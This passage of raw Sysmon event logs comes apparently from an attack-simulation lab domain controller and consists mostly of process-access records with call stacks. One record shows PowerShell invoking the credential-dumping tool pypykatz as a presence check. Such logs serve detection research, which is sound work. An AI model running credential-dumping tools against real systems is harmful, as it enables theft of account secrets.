ERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004573Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.615{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004572Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.615{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004571Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.615{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004570Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.615{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004569Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.615{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004568Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.615{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7CD6-5FA1-E500-000000008801}4764C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004567Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.615{D28789B6-7CD6-5FA1-E400-000000008801}49684220C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CD6-5FA1-E500-000000008801}4764C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31d4331b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e41a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e3e76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31c954db(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311a4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31202edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e63d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311d8356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e4889(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e4425(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e41a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e3e76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31c954db(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311a4a0c(wow64) 154100x80000000000000004566Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.621{D28789B6-7CD6-5FA1-E500-000000008801}4764C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c pypykatz -hC:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{D28789B6-7CCC-5FA1-4F36-080000000000}0x8364f0HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7CD6-5FA1-E400-000000008801}4968C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (cmd /c pypykatz -h) {exit 0} else {exit 1}} 10341000x80000000000000004565Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.552{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7CD6-5FA1-E400-000000008801}4968C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004564Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.552{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7CD6-5FA1-E400-000000008801}4968C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000004563Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.521{D28789B6-7CD6-5FA1-E400-000000008801}4968C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_sgjzbk01.5yp.ps12020-11-03 15:52:54.521 10341000x80000000000000004562Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.505{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7CD6-5FA1-E400-000000008801}4968C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004561Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.490{D28789B6-7CCC-5FA1-C800-000000008801}31001104C:\Windows\system32\conhost.exe{D28789B6-7CD6-5FA1-E400-000000008801}4968C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004560Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.490{D28789B6-7CCD-5FA1-CF00-000000008801}35644496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CD6-5FA1-E400-000000008801}4968C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3ed3|UNKNOWN(00007FF8DCAD8A03) 10341000x80000000000000004559Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.490{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004558Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.490{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004557Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.490{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004556Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.490{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004555Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.490{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004554Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.490{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004553Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.490{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004552Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.490{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004551Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.490{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004550Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.490{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7CD6-5FA1-E400-000000008801}4968C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004549Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 